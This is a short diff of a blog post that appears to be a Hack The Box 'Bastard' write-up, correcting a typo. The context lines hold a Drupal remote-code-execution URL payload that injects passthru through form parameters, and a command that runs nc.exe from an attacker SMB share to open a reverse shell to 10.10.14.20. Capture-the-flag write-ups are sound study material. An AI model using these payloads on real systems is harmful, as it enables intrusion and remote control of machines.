pwndside/pwndside.github.io/content/posts/bastard-htb.md

 http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]={payload}
 ```

-I put a smbserver.py on the nc.exe directory in orde to execute the next payload to have a reverse shell.
+I put a smbserver.py on the nc.exe directory in order to execute the next payload to have a reverse shell.

 ```powershell
 \\10.10.14.20\smbFolder\nc.exe -e cmd 10.10.14.20 4444